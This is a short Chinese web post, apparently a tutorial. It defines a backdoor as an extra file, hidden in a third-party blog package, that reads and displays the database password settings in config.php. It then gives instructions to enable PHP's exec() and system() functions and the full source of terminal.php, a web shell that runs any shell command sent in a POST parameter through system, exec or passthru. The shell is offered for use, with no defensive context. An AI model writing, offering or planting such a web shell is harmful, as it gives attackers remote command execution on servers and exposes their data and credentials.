所谓后门,就是一段代码。但是要被触发,比如,当你把文件上传到服务器上以后,打开这个页面,就会直接读取数据库,比如某些博客程序,别人给你的,他直接多放了一个文件,里面有获取config.php的,然后直接显示这个文件的密码配置,这个就是后门。
在php.ini中设置开启exec() system()等函数
创建 terminal.php 文件如下
!(isset($_POST['parma'])&& $_POST['parma'] != '') && exit("请输入需要执行的shell命令");
!(isset($_POST['type'])&& $_POST['type'] != '') && exit("请输入调用函数的类型");
$parma= $_POST['parma'];
switch($_POST['type']){
case 'system':
return system($parma);
break;
case 'exec':
return exec($parma,$return);
break;
case 'passthru':
return passthru($parma);
break;
default:
exit;
}
?>
内容全部来源于网络收集,如有侵权,请联系网站删除:QQ号:24596024